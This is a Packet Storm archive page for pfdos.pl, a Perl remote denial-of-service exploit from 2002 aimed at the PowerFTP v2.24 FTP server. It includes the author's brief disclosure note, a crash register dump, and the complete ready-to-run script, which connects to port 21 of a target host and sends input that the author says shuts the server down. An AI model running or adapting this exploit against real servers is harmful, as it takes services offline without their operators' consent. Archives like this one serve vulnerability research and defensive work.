exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pfdos.pl

pfdos.pl
Posted Oct 22, 2002
Authored by Securma Massine

PowerFTP v2.24 and below remote denial of service exploit in Perl.

tags | remote, denial of service, perl
SHA-256 | 6c35bcb40ba1d5bd9322642847860c17eb6c904541ae79689c51f4513a733837

pfdos.pl

Change Mirror Download
hi
The PowerFTPd is available from vendor Cooolsoft's website:
http://www.cooolsoft.com
I found a vulnerability has PowerFTP that allows a remote
user--any user--to shut down the ftp server (tested
on v 2.24)
I alerted coolsoft (05/10/2002) and as I did not have a
response until A now
this attack back is due A the bad management of erreures
due A the deconnection of the distant host I realised a
scripte Perl which launches this attack...and after the
state of the registers is:

Unknown exception - code c0000025 (first chance)
Stack overflow - code c00000fd (first chance)
eax=00033070 ebx=0012ffb4 ecx=0040371c edx=7846f5b5
esi=0003311c edi=00000001
eip=77ea98ca esp=00032d60 ebp=00033050 iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000206
kernel32!UnhandledExceptionFilter+25

and we have this message:


L exeption Exeption logicielle inconnue (0x0eedfade) s'est
produite dans l'application a l'emplacement 0x77e7f142

Exeption EFtpCtrlsocketexeption in module FTPServer.exe at
00059DE6. Data in buffer , cant change size

This was tested against PowerFTP Personal FTP Server v2.24

exploit:


#!/usr/bin/perl -w
##
# tool: PFdos.pl
# author: securma@caramail.com
# purpose: allows a remote user--any user--to shut
down the ftp server
# greetz: all friend in marocit and #crack.fr
(especially christal)
##

use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl <host>
~;
exit;}

$ip=$ARGV[0];
print "+++++++++++++++++++++++\n\n";
print "PowerFTP DOS \n\n";
print "by securma massine \n\n";
print "securma\@caramail.com \n\n";
print "+++++++++++++++++++++++\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,21,$target)){
select(S);
$|=1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...\n"); }
}








_________________________________________________________
Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
(0,34€ Hors coût du SMS)

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close